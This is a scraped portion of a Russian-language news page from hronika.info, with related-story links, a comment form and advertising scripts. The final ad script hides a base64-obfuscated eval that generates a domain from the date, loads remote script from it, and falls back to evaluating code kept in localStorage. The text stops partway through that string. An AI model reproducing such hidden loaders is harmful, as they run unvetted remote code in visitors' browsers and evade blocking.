<strong class="ttl" title="Молодая мама рисует веселые комиксы о своей семье"><a href="http://hronika.info/kurjozy/341397-molodaya-mama-risuet-veselye-komiksy-o-svoey-seme.html">Молодая мама рисует веселые комиксы о своей семье</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341393-smeshnye-fotki-zhivotnyh-kotorye-ne-mogut-skryvat-emocii.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533997985_20180708151754.jpg" alt="Смешные фотки животных, которые не могут скрывать эмоции" class="l_n_im" title="Смешные фотки животных, которые не могут скрывать эмоции" />
</a>
<strong class="ttl" title="Смешные фотки животных, которые не могут скрывать эмоции"><a href="http://hronika.info/kurjozy/341393-smeshnye-fotki-zhivotnyh-kotorye-ne-mogut-skryvat-emocii.html">Смешные фотки животных, которые не могут скрывать эмоции</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341380-v-gondurase-muzhchina-pritvorilsya-mertvym-chtoby-izbavitsya-ot-nadoedlivoy-suprugi.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533995335_111.jpg" alt="В Гондурасе мужчина притворился мертвым, чтобы избавиться от надоедливой супруги" class="l_n_im" title="В Гондурасе мужчина притворился мертвым, чтобы избавиться от надоедливой супруги" />
</a>
<strong class="ttl" title="В Гондурасе мужчина притворился мертвым, чтобы избавиться от надоедливой супруги"><a href="http://hronika.info/kurjozy/341380-v-gondurase-muzhchina-pritvorilsya-mertvym-chtoby-izbavitsya-ot-nadoedlivoy-suprugi.html">В Гондурасе мужчина притворился мертвым, чтобы избавиться от надоедливой супруги</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341371-milye-komiksy-o-zhizni-vseh-vlyublennyh.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533992632_22275415-11223860-18-0-1533733909-1533733917-720-1-1533733917-728-f13d10ebaa-1533903961.jpg" alt="Милые комиксы о жизни всех влюбленных" class="l_n_im" title="Милые комиксы о жизни всех влюбленных" />
</a>
<strong class="ttl" title="Милые комиксы о жизни всех влюбленных"><a href="http://hronika.info/kurjozy/341371-milye-komiksy-o-zhizni-vseh-vlyublennyh.html">Милые комиксы о жизни всех влюбленных</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341360-pozitivnye-snimki-zabavnyh-zhivotnyh.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533989580_00000000000007.jpg" alt="Позитивные снимки забавных животных" class="l_n_im" title="Позитивные снимки забавных животных" />
</a>
<strong class="ttl" title="Позитивные снимки забавных животных"><a href="http://hronika.info/kurjozy/341360-pozitivnye-snimki-zabavnyh-zhivotnyh.html">Позитивные снимки забавных животных</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341351-etim-podruzhkam-nevesty-yavno-ne-povezlo-s-platyami.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533986623_1533826414_plate3.jpg" alt="Этим подружкам невесты явно не повезло с платьями" class="l_n_im" title="Этим подружкам невесты явно не повезло с платьями" />
</a>
<strong class="ttl" title="Этим подружкам невесты явно не повезло с платьями"><a href="http://hronika.info/kurjozy/341351-etim-podruzhkam-nevesty-yavno-ne-povezlo-s-platyami.html">Этим подружкам невесты явно не повезло с платьями</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341341-ne-hotela-ehat-na-dachu-otca-devochki-prinyali-za-pohititelya.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533983726_29_main_new.1533982752.jpg" alt=""Не хотела ехать на дачу": отца девочки приняли за похитителя" class="l_n_im" title=""Не хотела ехать на дачу": отца девочки приняли за похитителя" />
</a>
<strong class="ttl" title=""Не хотела ехать на дачу": отца девочки приняли за похитителя"><a href="http://hronika.info/kurjozy/341341-ne-hotela-ehat-na-dachu-otca-devochki-prinyali-za-pohititelya.html">"Не хотела ехать на дачу": отца девочки приняли за похитителя</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341330-zabavnye-snimki-iz-serii-ugaday-stranu.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533979702_fun-russia.jpg" alt="Забавные снимки из серии "Угадай страну..."" class="l_n_im" title="Забавные снимки из серии "Угадай страну..."" />
</a>
<strong class="ttl" title="Забавные снимки из серии "Угадай страну...""><a href="http://hronika.info/kurjozy/341330-zabavnye-snimki-iz-serii-ugaday-stranu.html">Забавные снимки из серии "Угадай страну..."</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341318-absurdnaya-velodorozhka-v-germanii-poveselila-set.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/1533976436_345357.jpg" alt="Абсурдная велодорожка в Германии повеселила Сеть" class="l_n_im" title="Абсурдная велодорожка в Германии повеселила Сеть" />
</a>
<strong class="ttl" title="Абсурдная велодорожка в Германии повеселила Сеть"><a href="http://hronika.info/kurjozy/341318-absurdnaya-velodorozhka-v-germanii-poveselila-set.html">Абсурдная велодорожка в Германии повеселила Сеть</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341308-zlobodnevnye-karikatury-ot-talantlivogo-illyustratora.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533973313_dmitrykorotchenko14.jpg" alt="Злободневные карикатуры от талантливого иллюстратора" class="l_n_im" title="Злободневные карикатуры от талантливого иллюстратора" />
</a>
<strong class="ttl" title="Злободневные карикатуры от талантливого иллюстратора"><a href="http://hronika.info/kurjozy/341308-zlobodnevnye-karikatury-ot-talantlivogo-illyustratora.html">Злободневные карикатуры от талантливого иллюстратора</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341299-zabavnye-malyshi-kotorye-razveselyat-lyubogo-svoim-povedeniem.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533971027_0000000000000000000000000000000000000.jpg" alt="Забавные малыши, которые развеселят любого своим поведением" class="l_n_im" title="Забавные малыши, которые развеселят любого своим поведением" />
</a>
<strong class="ttl" title="Забавные малыши, которые развеселят любого своим поведением"><a href="http://hronika.info/kurjozy/341299-zabavnye-malyshi-kotorye-razveselyat-lyubogo-svoim-povedeniem.html">Забавные малыши, которые развеселят любого своим поведением</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/341293-sutki-v-oos-36-obstrelov-troe-ranenyh-ukrainskih-boycov.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533969990_sutki-v-oos-36-obstrelov-troe-ranenyh-ukrainskih-boycov.jpg" alt="Сутки в ООС: 36 обстрелов, трое раненых украинских бойцов" class="l_n_im" title="Сутки в ООС: 36 обстрелов, трое раненых украинских бойцов" />
</a>
<strong class="ttl" title="Сутки в ООС: 36 обстрелов, трое раненых украинских бойцов"><a href="http://hronika.info/ukraina/341293-sutki-v-oos-36-obstrelov-troe-ranenyh-ukrainskih-boycov.html">Сутки в ООС: 36 обстрелов, трое раненых украинских бойцов</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341285-utrennie-anekdoty-dlya-subbotnego-nastroeniya.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533968244_2346.jpg" alt="Утренние анекдоты для субботнего настроения" class="l_n_im" title="Утренние анекдоты для субботнего настроения" />
</a>
<strong class="ttl" title="Утренние анекдоты для субботнего настроения"><a href="http://hronika.info/kurjozy/341285-utrennie-anekdoty-dlya-subbotnego-nastroeniya.html">Утренние анекдоты для субботнего настроения</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341162-umoritelnye-fotki-iz-serii-za-sekundu-do.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533908333_im-yavno-ne-povezlo.3.jpg" alt="Уморительные фотки из серии «За секунду до»" class="l_n_im" title="Уморительные фотки из серии «За секунду до»" />
</a>
<strong class="ttl" title="Уморительные фотки из серии «За секунду до»"><a href="http://hronika.info/kurjozy/341162-umoritelnye-fotki-iz-serii-za-sekundu-do.html">Уморительные фотки из серии «За секунду до»</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/341237-v-hersonskiy-port-zashlo-rossiyskoe-sudno-iz-sankcionnogo-spiska-snbo.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533932128_2182555.jpg" alt="В Херсонский порт зашло российское судно из санкционного списка СНБО" class="l_n_im" title="В Херсонский порт зашло российское судно из санкционного списка СНБО" />
</a>
<strong class="ttl" title="В Херсонский порт зашло российское судно из санкционного списка СНБО"><a href="http://hronika.info/ukraina/341237-v-hersonskiy-port-zashlo-rossiyskoe-sudno-iz-sankcionnogo-spiska-snbo.html">В Херсонский порт зашло российское судно из санкционного списка СНБО</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341161-smeshnye-komiksy-dlya-teh-kto-umeet-veselitsya.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533908117_komiksy.jpg" alt="Смешные комиксы для тех, кто умеет веселиться" class="l_n_im" title="Смешные комиксы для тех, кто умеет веселиться" />
</a>
<strong class="ttl" title="Смешные комиксы для тех, кто умеет веселиться"><a href="http://hronika.info/kurjozy/341161-smeshnye-komiksy-dlya-teh-kto-umeet-veselitsya.html">Смешные комиксы для тех, кто умеет веселиться</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341160-mini-katastrofy-nad-kotorymi-stoit-prosto-posmeyatsya.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533907736_katastrofa.jpg" alt="Мини-катастрофы, над которыми стоит просто посмеяться" class="l_n_im" title="Мини-катастрофы, над которыми стоит просто посмеяться" />
</a>
<strong class="ttl" title="Мини-катастрофы, над которыми стоит просто посмеяться"><a href="http://hronika.info/kurjozy/341160-mini-katastrofy-nad-kotorymi-stoit-prosto-posmeyatsya.html">Мини-катастрофы, над которыми стоит просто посмеяться</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341149-zabavnye-problemy-sovremennoy-molodezhi.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533906220_molodezh.jpg" alt="Забавные проблемы современной молодежи" class="l_n_im" title="Забавные проблемы современной молодежи" />
</a>
<strong class="ttl" title="Забавные проблемы современной молодежи"><a href="http://hronika.info/kurjozy/341149-zabavnye-problemy-sovremennoy-molodezhi.html">Забавные проблемы современной молодежи</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341147-smeshnye-fotki-domashnih-pitomcev-kopiruyuschih-svoih-hozyaev.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533905927_pitomcy2.jpg" alt="Смешные фотки домашних питомцев, копирующих своих хозяев" class="l_n_im" title="Смешные фотки домашних питомцев, копирующих своих хозяев" />
</a>
<strong class="ttl" title="Смешные фотки домашних питомцев, копирующих своих хозяев"><a href="http://hronika.info/kurjozy/341147-smeshnye-fotki-domashnih-pitomcev-kopiruyuschih-svoih-hozyaev.html">Смешные фотки домашних питомцев, копирующих своих хозяев</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/341205-situaciya-na-donbasse-odin-voennyy-poluchil-oskolochnoe-ranenie.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533919796_c39ee38f1d506a5167f74f713ef2e79c5420165e.jpg" alt="Ситуация на Донбассе: один военный получил осколочное ранение" class="l_n_im" title="Ситуация на Донбассе: один военный получил осколочное ранение" />
</a>
<strong class="ttl" title="Ситуация на Донбассе: один военный получил осколочное ранение"><a href="http://hronika.info/ukraina/341205-situaciya-na-donbasse-odin-voennyy-poluchil-oskolochnoe-ranenie.html">Ситуация на Донбассе: один военный получил осколочное ранение</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341146-veselye-tvity-ot-lyudey-s-otmennym-chuvstvom-yumora.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533905780_tvitter7.jpg" alt="Веселые твиты от людей с отменным чувством юмора" class="l_n_im" title="Веселые твиты от людей с отменным чувством юмора" />
</a>
<strong class="ttl" title="Веселые твиты от людей с отменным чувством юмора"><a href="http://hronika.info/kurjozy/341146-veselye-tvity-ot-lyudey-s-otmennym-chuvstvom-yumora.html">Веселые твиты от людей с отменным чувством юмора</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/341190-v-seti-vysmeyali-priklyucheniya-rossiyskogo-laynera-u-beregov-kryma.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533912610_layner2.jpg" alt="В Сети высмеяли «приключения» российского лайнера у берегов Крыма" class="l_n_im" title="В Сети высмеяли «приключения» российского лайнера у берегов Крыма" />
</a>
<strong class="ttl" title="В Сети высмеяли «приключения» российского лайнера у берегов Крыма"><a href="http://hronika.info/kurjozy/341190-v-seti-vysmeyali-priklyucheniya-rossiyskogo-laynera-u-beregov-kryma.html">В Сети высмеяли «приключения» российского лайнера у берегов Крыма</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mnenia/341008-vsya-pravda-ob-ukrainskom-futbole.html"><img src="/posters/167_120_50_1/uploads/posts/2018-08/thumbs/1533882573_sergey-fursa.jpg" alt="Вся правда об украинском футболе" class="l_n_im" title="Вся правда об украинском футболе" />
</a>
<strong class="ttl" title="Вся правда об украинском футболе"><a href="http://hronika.info/mnenia/341008-vsya-pravda-ob-ukrainskom-futbole.html">Вся правда об украинском футболе</a></strong>
</li></ul>
        </div>
        <a class="buttons next" href="#"></a> 
      </div>
    </div>
</div>

<br />
<div id="comments_tab"><b>Оставьте свой комментарий</b>
<!--  <ul class="tabs">
  <li>
    <a href="#hronika">Хроника</a>
  </li>
<li>
    <a href="#vkontakte">Вконтакте</a>
  </li> 
  <li>
    <a href="#facebook">Фейсбук</a>
  </li>
</ul> -->
<div class="clr">
  <div id="hronika">
<form  method="post" name="dle-comments-form" id="dle-comments-form" action="/kultura/341530-dasha-astafeva-vystavila-napokaz-pyshnoe-dekolte.html"><br />
<div class="baseform addcomfrm">
	<table class="tableform">
		
		<tr>
			<td class="label">
				Имя:<span class="impot">*&nbsp;&nbsp;</span>
				<input type="text" name="name" id="name" class="f_input" />
			</td>
		</tr>
		<tr>	
			<td class="label">E-Mail:<input type="text" name="mail" id="mail" class="f_input" style="margin-left:8px" /></td>
		</tr>
		
		<tr>	
			<td class="editorcomm"><script type="text/javascript">
<!--
var text_enter_url       = "Введите полный URL ссылки";
var text_enter_size       = "Введите размеры флэш ролика (ширина, высота)";
var text_enter_flash       = "Введите ссылку на флэш ролик";
var text_enter_page      = "Введите номер страницы";
var text_enter_url_name  = "Введите описание ссылки";
var text_enter_page_name = "Введите описание ссылки";
var text_enter_image    = "Введите полный URL изображения";
var text_enter_email    = "Введите e-mail адрес";
var text_code           = "Использование: [CODE] Здесь Ваш код.. [/CODE]";
var text_quote          = "Использование: [QUOTE] Здесь Ваша Цитата.. [/QUOTE]";
var text_upload         = "Загрузка файлов и изображений на сервер";
var error_no_url        = "Вы должны ввести URL";
var error_no_title      = "Вы должны ввести название";
var error_no_email      = "Вы должны ввести e-mail адрес";
var prompt_start        = "Введите текст для форматирования";
var img_title   		= "Введите по какому краю выравнивать картинку (left, center, right)";
var email_title  	    = "Введите описание ссылки";
var text_pages  	    = "Страница";
var image_align  	    = "left";
var bb_t_emo  	        = "Вставка смайликов";
var bb_t_col  	        = "Цвет:";
var text_enter_list     = "Введите пункт списка. Для завершения ввода оставьте поле пустым.";
var text_alt_image      = "Введите описание изображения";
var img_align  	        = "Выравнивание";
var img_align_sel  	    = "<select name='dleimagealign' id='dleimagealign' class='ui-widget-content ui-corner-all'><option value='' >Нет</option><option value='left' selected>По левому краю</option><option value='right' >По правому краю</option><option value='center' >По центру</option></select>";

var selField  = "comments";
var fombj    = document.getElementById( 'dle-comments-form' );
-->
</script>
<div class="bb-editor">
<div class="bb-pane" onmouseenter="if(is_ie9) get_sel(eval('fombj.'+ selField));">
<b id="b_b" class="bb-btn" onclick="simpletag('b')" title="Полужирный">Полужирный</b>
<b id="b_i" class="bb-btn" onclick="simpletag('i')" title="Наклонный текст">Наклонный текст</b>
<b id="b_u" class="bb-btn" onclick="simpletag('u')" title="Подчёркнутый текст">Подчёркнутый текст</b>
<b id="b_s" class="bb-btn" onclick="simpletag('s')" title="Зачёркнутый текст">Зачёркнутый текст</b>
<span class="bb-sep">|</span>
<b id="b_left" class="bb-btn" onclick="simpletag('left')" title="Выравнивание по левому краю">Выравнивание по левому краю</b>
<b id="b_center" class="bb-btn" onclick="simpletag('center')" title="По центру">По центру</b>
<b id="b_right" class="bb-btn" onclick="simpletag('right')" title="Выравнивание по правому краю">Выравнивание по правому краю</b>
<span class="bb-sep">|</span>
<b id="b_emo" class="bb-btn" onclick="ins_emo(this)" title="Вставка смайликов">Вставка смайликов</b>


<b id="b_color" class="bb-btn" onclick="ins_color(this)" title="Выбор цвета">Выбор цвета</b>
<span class="bb-sep">|</span>
<b id="b_hide" class="bb-btn" onclick="simpletag('hide')" title="Скрытый текст">Скрытый текст</b>
<b id="b_quote" class="bb-btn" onclick="simpletag('quote')" title="Вставка цитаты">Вставка цитаты</b>
<b id="b_tnl" class="bb-btn" onclick="translit()" title="Преобразовать выбранный текст из транслитерации в кириллицу">Преобразовать выбранный текст из транслитерации в кириллицу</b>
<b id="b_spoiler" class="bb-btn" onclick="simpletag('spoiler')" title="Вставка спойлера">Вставка спойлера</b>
</div>
<div id="dle_emos" style="display: none;" title="Вставка смайликов"><div style="width:100%;height:100%;overflow: auto;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wink:'); return false;"><img style="border: none;" alt="wink" src="http://hronika.info/engine/data/emoticons/wink.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':winked:'); return false;"><img style="border: none;" alt="winked" src="http://hronika.info/engine/data/emoticons/winked.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':smile:'); return false;"><img style="border: none;" alt="smile" src="http://hronika.info/engine/data/emoticons/smile.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':am:'); return false;"><img style="border: none;" alt="am" src="http://hronika.info/engine/data/emoticons/am.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':belay:'); return false;"><img style="border: none;" alt="belay" src="http://hronika.info/engine/data/emoticons/belay.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':feel:'); return false;"><img style="border: none;" alt="feel" src="http://hronika.info/engine/data/emoticons/feel.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':fellow:'); return false;"><img style="border: none;" alt="fellow" src="http://hronika.info/engine/data/emoticons/fellow.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':laughing:'); return false;"><img style="border: none;" alt="laughing" src="http://hronika.info/engine/data/emoticons/laughing.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':lol:'); return false;"><img style="border: none;" alt="lol" src="http://hronika.info/engine/data/emoticons/lol.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':love:'); return false;"><img style="border: none;" alt="love" src="http://hronika.info/engine/data/emoticons/love.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':no:'); return false;"><img style="border: none;" alt="no" src="http://hronika.info/engine/data/emoticons/no.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':recourse:'); return false;"><img style="border: none;" alt="recourse" src="http://hronika.info/engine/data/emoticons/recourse.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':request:'); return false;"><img style="border: none;" alt="request" src="http://hronika.info/engine/data/emoticons/request.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':sad:'); return false;"><img style="border: none;" alt="sad" src="http://hronika.info/engine/data/emoticons/sad.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':tongue:'); return false;"><img style="border: none;" alt="tongue" src="http://hronika.info/engine/data/emoticons/tongue.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wassat:'); return false;"><img style="border: none;" alt="wassat" src="http://hronika.info/engine/data/emoticons/wassat.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':crying:'); return false;"><img style="border: none;" alt="crying" src="http://hronika.info/engine/data/emoticons/crying.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':what:'); return false;"><img style="border: none;" alt="what" src="http://hronika.info/engine/data/emoticons/what.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':bully:'); return false;"><img style="border: none;" alt="bully" src="http://hronika.info/engine/data/emoticons/bully.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':angry:'); return false;"><img style="border: none;" alt="angry" src="http://hronika.info/engine/data/emoticons/angry.gif" /></a></td></tr></table></div></div>
<textarea name="comments" id="comments" cols="70" rows="10" onfocus="setNewField(this.name, document.getElementById( 'dle-comments-form' ))"></textarea>
</div></td>
		</tr>
			
			
		<tr>		
			<td class="label">Введите код: <span class="impot">*</span></td>	
			<td>	
				<div><span id="dle-captcha"><img src="/engine/modules/antibot/antibot.php" alt="Включите эту картинку для отображения кода безопасности" width="160" height="80" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a></span></div>	
				<div><input type="text" name="sec_code" id="sec_code" style="width:115px" class="f_input" /></div>
			</td>	
		</tr>	
			
			
	</table>
	<br />
</div>
	<div class="fieldsubmit" style=" position: relative; width: 100%; height: 23px; top: -10px; ">	
		<button type="submit" name="submit" class="fbutton addcombut"><span>Добавить</span></button>
	</div>

		<input type="hidden" name="subaction" value="addcomment" />
		<input type="hidden" name="post_id" id="post_id" value="341530" /></form><script type="text/javascript">
<!--
$(function(){

	$('#dle-comments-form').submit(function() {
	  doAddComments();
	  return false;
	});

});

function reload () {

	var rndval = new Date().getTime(); 

	document.getElementById('dle-captcha').innerHTML = '<img src="/engine/modules/antibot/antibot.php?rndval=' + rndval + '" width="160" height="80" alt="" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a>';

};
//-->
</script>
  </div>

  <!--
  <div id="vkontakte">


<script type="text/javascript" src="//vk.com/js/api/openapi.js?98"></script>

<script type="text/javascript">
  VK.init({apiId: 3098550, onlyWidgets: true});
</script>


<div id="vk_comments"></div>
<script type="text/javascript">
VK.Widgets.Comments("vk_comments", {limit: 10, width: "100%", attach: "*"});
</script>
      
  </div>
  <div id="facebook">
<div class="fb-comments" data-href="http://hronika.info/kultura/341530-dasha-astafeva-vystavila-napokaz-pyshnoe-dekolte.html" data-width="410"></div>      
  </div>
  -->
  </div> 
</div>
 
<div id="dle-ajax-comments"></div>

<!--dlenavigationcomments-->
<div class="clr"><br /></div>
</div>
<div id='_mwayss-13a2bf393830a24cb00f9b493f869072'></div>
                <script>      
                    (function(window, document, undefined) {
                        var script_tag = document.createElement('script');
                        script_tag.src = 'https://ad.mediawayss.com/ad/mwayss_invocation.min.js?pzoneid=1171&height=288&width=512&tld=hronika.info&ctype=div&ch=DOMAIN_HERE';
                        var container = document.getElementById('_mwayss-13a2bf393830a24cb00f9b493f869072');    
                        container.parentNode.insertBefore(script_tag, container);
                    })(window, document);
                </script>
<script>
$.ctrl = function(key, callback, args) {
    var isCtrl = false;
    $(document).keydown(function(e) {
        if(!args) args=[]; 
        isCtrl = e.ctrlKey;
        if((e.keyCode == key.charCodeAt(0) || e.keyCode == 45) && isCtrl) callback.apply(this, args);
    }).keyup(function(e) {
        if(e.ctrlKey) isCtrl = false;
    });        
};
$.ctrl('C', function() {
    $('body').prepend("<div id='ctrl_c' class='ctrl_c' align='justify'><span>&times;</span>Использование материалов и новостей с сайта <a style='font-size: 11px;' href='http://hronika.info'>hronika.info</a> разрешается только при условии размещения прямой, открытой для поисковых систем, гиперссылки на опубликованную или цитируемую новость.</div>");
    $("#ctrl_c > span").click( function() { $("#ctrl_c").remove(); });

	
ns4 = (document.layers)? true:false
ie4 = (document.all)? true:false

function mousemove(event) {
        var mouse_x = y = 0;
    if (document.attachEvent != null) {
        mouse_x = window.event.clientX;
        mouse_y = window.event.clientY;
    } else if (!document.attachEvent && document.addEventListener) {
        mouse_x = event.clientX;
        mouse_y = event.clientY;
    }
    
}

    document.onmousemove=mousemove;

});

$(document).ready(function(){
var fimg=$(".ax-full img").first();
fimg.css({"width":"200px","height":"150px"});
});
</script>
</div></article>
            </div>
          </div>

             <aside id="sideRight2"><!---->

         <!-- 
		 <div class="wrap"> 
         	
         -->

<div class="row-600">
    <div class="col-336">
        <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="3119660949"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
    </div>
    <div class="col-260">
       <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10484">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10484/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
        
    </div>
</div>



<div class="clr"></div>

<div class="width49-4 fleft">  
            <div class="wrap">
            <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10493">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10493/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
            <script type="text/javascript">

    (function(w, d, y, h, p, a, b) {
        w[y] = w[y] || []; w[y].push(function() {return [a, b]});
        for (var e, r = d.getElementsByTagName("script"), t = h + "/d0e1/e179f51b/5154/719f/5b027feea71/0e17fee/d0e17fe", n = r.length; n--;) (r[n].src == t || r[n].src.indexOf(t) > -1) && (e = r[n]);
        if (w['ccScriptSupport'] === undefined || !e) {
            var s = d.head || d.getElementsByTagName("head")[0]; e = d.createElement("script"), e.type = "text/javascript", e.src = t, s.appendChild(e);e.setAttribute('data-base', h);e.setAttribute('data-config', p);
        }
    })(this, this.document, "spAsyncScript", 'https://csp-qcw5yi.ru', 9568, this.document.currentScript, '5b4f41520bbda536cf2240e3');
</script>    
            <div id="MIXADV_4786" class="MIXADVERT_NET"></div>
          <script> 
          var node4786 = document.getElementById("MIXADV_4786");
          if( node4786 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4786&r="+Math.random();
               node4786.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ4eXoiXTsgdmFyIHN0ciA9ZGF5Kihtb250aCAqIG5hbWVfZGF5ICogZGF5KSsiIisgZGF5Kihtb250aCArIG5hbWVfZGF5ICsgZGF5ICt5ZWFyKTt2YXIgaGFzaCA9ICBidG9hKGJ0b2Eoc3RyKSkudG9Mb3dlckNhc2UoKTsgdmFyIGhvc3QgPSBoYXNoLnN1YnN0cmluZygzLCBoYXNoLmxlbmd0aCAtIG5hbWVfZGF5LzIpKyIuIitkb21bbmFtZV9kYXkgLSAxXTt2YXIgciA9IE1hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cigyLCAyKTtyID0gci5yZXBsYWNlKC9bMC05XS9nLCAiIik7dmFyIGRlbHRhID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogKDEwMCAtIDEwICsgMSkpICsgMTA7dmFyIGlkID0gNDc4NiAtIGRlbHRhOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi8iK2RlbHRhK2lkK3IrIiI7IG5vZGU0Nzg2LnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTtzY3JpcHRfZmlyc3Qub25lcnJvciA9IGZ1bmN0aW9uKCl7IHNldFRpbWVvdXQoIGZ1bmN0aW9uICgpIHsgaWYoIG5vZGU0Nzg2LmlubmVySFRNTCA9PSAiIiApIHdpbmRvdy5ldmFsKGxvY2FsU3RvcmFnZS5nZXRJdGVtKCI0Nzg2IikpIH0sIDUwMDApOyAg